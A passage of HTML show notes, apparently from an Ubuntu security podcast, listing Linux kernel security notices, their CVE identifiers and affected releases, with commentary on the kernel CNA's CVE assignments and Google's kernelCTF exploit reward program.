<li><a href="https://ubuntu.com/security/CVE-2023-52599">CVE-2023-52599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26592">CVE-2024-26592</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26610">CVE-2024-26610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26608">CVE-2024-26608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26704">CVE-2024-26704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26671">CVE-2024-26671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26676">CVE-2024-26676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52583">CVE-2023-52583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26689">CVE-2024-26689</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26910">CVE-2024-26910</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52619">CVE-2023-52619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52498">CVE-2023-52498</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52638">CVE-2023-52638</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26685">CVE-2024-26685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26673">CVE-2024-26673</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52602">CVE-2023-52602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52627">CVE-2023-52627</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26614">CVE-2024-26614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26720">CVE-2024-26720</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26625">CVE-2024-26625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26594">CVE-2024-26594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52606">CVE-2023-52606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26825">CVE-2024-26825</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52637">CVE-2023-52637</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52588">CVE-2023-52588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52618">CVE-2023-52618</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26663">CVE-2024-26663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26684">CVE-2024-26684</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52633">CVE-2023-52633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52493">CVE-2023-52493</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26665">CVE-2024-26665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52622">CVE-2023-52622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26826">CVE-2024-26826</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52601">CVE-2023-52601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52594">CVE-2023-52594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23849">CVE-2024-23849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2201">CVE-2024-2201</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0001">CVE-2022-0001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1151">CVE-2024-1151</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 - raspi kernel on 22.04 and OEM or optional HWE on 20.04</li>
<li>Linux kernel CNA has been quite busy assigning both historical and recent CVEs against the kernel</li>
<li>As discussed previously <a href="/episode-219/#linux-kernel-becomes-a-cna--11-25">Linux kernel becomes a CNA from Episode 219</a> <a href="/episode-220/#follow-up-to-linux-kernel-cna--11-40">Follow up
to Linux kernel CNA from Episode 220</a>, the impact of these CVEs is often not
apparent so it makes it quite hard to assign a proper priority - even the
kernel CNA themselves are not assigning a CVSS score - so for now we have
little information which we can glean for each of these</li>
<li>As such, the USNs contain quite little detail and are very generic - and for
each we will be assigning just a medium priority unless we have some good
evidence otherwise</li>
<li>One example here is <a href="https://ubuntu.com/security/CVE-2024-26808">CVE-2024-26808</a> - UAF in netfilter - was reported via
Google&rsquo;s kernelCTF (not to be confused with their <a href="https://google.github.io/kctf/">kCTF</a> which is their
kubernetes-based CTF hosting platform - but which also has a <a href="https://google.github.io/kctf/vrp.html">vulnerabilities
reward program (VRP)</a>) - <a href="https://google.github.io/security-research/kernelctf/rules.html">kernelCTF</a> - program to offer rewards for exploits
against the kernel - but not just any exploits - can&rsquo;t use <code>io_uring</code> or
<code>nftables</code> since they were disabled in their target kernel configuration due to
<a href="https://security.googleblog.com/2023/06/learnings-from-kctf-vrps-42-linux.html">high number of historical vulns</a> in both subsystems
<ul>
<li>base reward of $21k, $10k bonus if is reliable more than 90% of the time,
additional $20k bonus if works without using unprivileged user namespaces,
and a final additional $20k bonus if it is 0-day (ie not patched in the
mainline tree and not disclosed anywhere - including via syzkaller)</li>
</ul>
</li>
<li>So in this case, we rated this CVE with a high priority since it is known
exploitable
<ul>
<li>can see it listed in their <a href="https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pubhtml">public spreadsheet</a></li>
</ul>
</li>
</ul>
<h3 id="usn-6766-3-linux-kernel--aws--vulnerabilities--04-48">[<a href="https://ubuntu.com/security/notices/USN-6766-3">USN-6766-3</a>] Linux kernel (AWS) vulnerabilities (04:48)</h3>
<ul>
<li>92 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26697">CVE-2024-26697</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52489">CVE-2023-52489</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26644">CVE-2024-26644</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26702">CVE-2024-26702</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52492">CVE-2023-52492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52616">CVE-2023-52616</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26808">CVE-2024-26808</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26920">CVE-2024-26920</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52494">CVE-2023-52494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26698">CVE-2024-26698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26695">CVE-2024-26695</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52635">CVE-2023-52635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26707">CVE-2024-26707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26715">CVE-2024-26715</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52597">CVE-2023-52597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52435">CVE-2023-52435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26668">CVE-2024-26668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52598">CVE-2023-52598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26593">CVE-2024-26593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52643">CVE-2023-52643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26717">CVE-2024-26717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52604">CVE-2023-52604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26602">CVE-2024-26602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26664">CVE-2024-26664</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52491">CVE-2023-52491</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26635">CVE-2024-26635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26640">CVE-2024-26640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26696">CVE-2024-26696</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26627">CVE-2024-26627</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52623">CVE-2023-52623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26641">CVE-2024-26641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26829">CVE-2024-26829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26679">CVE-2024-26679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26600">CVE-2024-26600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26916">CVE-2024-26916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26606">CVE-2024-26606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52614">CVE-2023-52614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26675">CVE-2024-26675</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26712">CVE-2024-26712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52587">CVE-2023-52587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52642">CVE-2023-52642</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26636">CVE-2024-26636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52615">CVE-2023-52615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26615">CVE-2024-26615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26722">CVE-2024-26722</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52608">CVE-2023-52608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52607">CVE-2023-52607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52631">CVE-2023-52631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52486">CVE-2023-52486</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26645">CVE-2024-26645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52617">CVE-2023-52617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26660">CVE-2024-26660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52595">CVE-2023-52595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52599">CVE-2023-52599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26592">CVE-2024-26592</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26610">CVE-2024-26610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26608">CVE-2024-26608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26704">CVE-2024-26704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26671">CVE-2024-26671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26676">CVE-2024-26676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52583">CVE-2023-52583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26689">CVE-2024-26689</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26910">CVE-2024-26910</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52619">CVE-2023-52619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52498">CVE-2023-52498</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52638">CVE-2023-52638</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26685">CVE-2024-26685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26673">CVE-2024-26673</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52602">CVE-2023-52602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52627">CVE-2023-52627</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26614">CVE-2024-26614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26720">CVE-2024-26720</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26625">CVE-2024-26625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26594">CVE-2024-26594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52606">CVE-2023-52606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26825">CVE-2024-26825</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52637">CVE-2023-52637</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52588">CVE-2023-52588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52618">CVE-2023-52618</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26663">CVE-2024-26663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26684">CVE-2024-26684</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52633">CVE-2023-52633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52493">CVE-2023-52493</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26665">CVE-2024-26665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52622">CVE-2023-52622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26826">CVE-2024-26826</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52601">CVE-2023-52601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52594">CVE-2023-52594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23849">CVE-2024-23849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2201">CVE-2024-2201</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0001">CVE-2022-0001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1151">CVE-2024-1151</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 - AWS on both 22.04 and 20.04</li>
</ul>
<h3 id="usn-6774-1-linux-kernel-vulnerabilities--05-01">[<a href="https://ubuntu.com/security/notices/USN-6774-1">USN-6774-1</a>] Linux kernel vulnerabilities (05:01)</h3>
<ul>
<li>13 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26801">CVE-2024-26801</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52601">CVE-2023-52601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26622">CVE-2024-26622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26635">CVE-2024-26635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52602">CVE-2023-52602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26614">CVE-2024-26614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52604">CVE-2023-52604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26805">CVE-2024-26805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52615">CVE-2023-52615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26704">CVE-2024-26704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2201">CVE-2024-2201</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0001">CVE-2022-0001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47233">CVE-2023-47233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.5 - all on 23.10, HWE (all) on 22.04</li>
</ul>
<h3 id="usn-6775-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6775-1">USN-6775-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52530">CVE-2023-52530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26622">CVE-2024-26622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47233">CVE-2023-47233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 all on 22.04, HWE (all) on 20.04</li>
</ul>
<h3 id="usn-6775-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6775-2">USN-6775-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52530">CVE-2023-52530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26622">CVE-2024-26622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47233">CVE-2023-47233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 AWS/GKE</li>
</ul>
<h3 id="usn-6776-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6776-1">USN-6776-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26622">CVE-2024-26622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52530">CVE-2023-52530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26614">CVE-2024-26614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47233">CVE-2023-47233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 all on 20.04, HWE (all) on 18.04</li>
</ul>
<h3 id="usn-6777-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6777-1">USN-6777-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>17 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52583">CVE-2023-52583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26801">CVE-2024-26801</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26805">CVE-2024-26805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26735">CVE-2024-26735</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26622">CVE-2024-26622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46981">CVE-2021-46981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52566">CVE-2023-52566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52604">CVE-2023-52604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26704">CVE-2024-26704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26614">CVE-2024-26614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52602">CVE-2023-52602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26635">CVE-2024-26635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52439">CVE-2023-52439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52601">CVE-2023-52601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52530">CVE-2023-52530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52524">CVE-2023-52524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47233">CVE-2023-47233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 - all on 18.04, HWE (all) on 16.04</li>
</ul>
<h3 id="usn-6777-2-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6777-2">USN-6777-2</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>17 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52583">CVE-2023-52583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26801">CVE-2024-26801</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26805">CVE-2024-26805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26735">CVE-2024-26735</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26622">CVE-2024-26622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46981">CVE-2021-46981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52566">CVE-2023-52566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52604">CVE-2023-52604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26704">CVE-2024-26704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26614">CVE-2024-26614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52602">CVE-2023-52602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26635">CVE-2024-26635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52439">CVE-2023-52439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52601">CVE-2023-52601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52530">CVE-2023-52530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52524">CVE-2023-52524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47233">CVE-2023-47233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 - azure</li>
</ul>
<h3 id="usn-6777-3-linux-kernel--gcp--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6777-3">USN-6777-3</a>] Linux kernel (GCP) vulnerabilities</h3>
<ul>
<li>17 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52583">CVE-2023-52583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26801">CVE-2024-26801</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26805">CVE-2024-26805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26735">CVE-2024-26735</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26622">CVE-2024-26622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46981">CVE-2021-46981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52566">CVE-2023-52566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52604">CVE-2023-52604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26704">CVE-2024-26704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26614">CVE-2024-26614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52602">CVE-2023-52602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26635">CVE-2024-26635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52439">CVE-2023-52439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52601">CVE-2023-52601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52530">CVE-2023-52530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52524">CVE-2023-52524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47233">CVE-2023-47233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6778-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6778-1">USN-6778-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>14 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52524">CVE-2023-52524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52530">CVE-2023-52530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52604">CVE-2023-52604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26614">CVE-2024-26614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46939">CVE-2021-46939</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26704">CVE-2024-26704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52566">CVE-2023-52566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26801">CVE-2024-26801</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52602">CVE-2023-52602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26635">CVE-2024-26635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26805">CVE-2024-26805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26622">CVE-2024-26622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52601">CVE-2023-52601</a> <!-- raw HTML omitted --></li>
